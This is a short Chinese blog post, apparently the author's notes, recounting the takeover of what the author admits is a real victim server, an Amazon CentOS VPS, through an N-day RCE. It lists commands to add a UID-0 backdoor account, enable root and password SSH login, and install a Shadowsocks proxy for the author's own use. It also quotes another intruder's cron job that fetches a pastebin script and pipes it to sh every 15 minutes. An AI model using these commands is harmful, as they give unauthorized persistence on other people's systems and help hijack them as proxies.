一直在路上

记一次靶机利用

    学习笔记

  1. 0x00
  2. 0x01
  3. 0x02
  4. 0x03
  5. 0x04

0x00

说是靶机其实是在复现某Nday时打下来的肉鸡QAQ
利用RCE漏洞弹了个shell,惊讶地发现还是root权限。
目标亚马逊主机,国外VPS,CentOS服务器。。正好用来做代理。

0x01

由于反弹会话无法完成交互所以先添加个用户,并给予root权限:

1
2
3
useradd amason
echo amason:test666 | chpasswd
sed -i 's/amason:x:502:503::/amason:x:0:503::/g' /etc/passwd

0x02

连接ssh时发现密码登陆被禁用了,遂修改配置文件并重启ssh服务:

1
2
3
sed -i 's/#PermitRootLogin yes/PermitRootLogin yes/g' /etc/ssh/sshd_config
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service sshd restart

0x03

顺利连上ssh,直接上ss一键搭建脚本吧:

1
2
3
wget –no-check-certificate -O shadowsocks.sh https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks.sh
chmod +x shadowsocks.sh
./shadowsocks.sh

本来还想整个bbr加速的,但是不方便重启vps,就放弃了。

0x04

以为就此结束了吗?
准备擦屁股下线走人的时候习惯性地看了下计划任务:
crontab -e
*/15 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
额,原来早被人种马了。

(等我后续分析。。。)

页阅读量:  ・  站访问量:  ・  站访客数: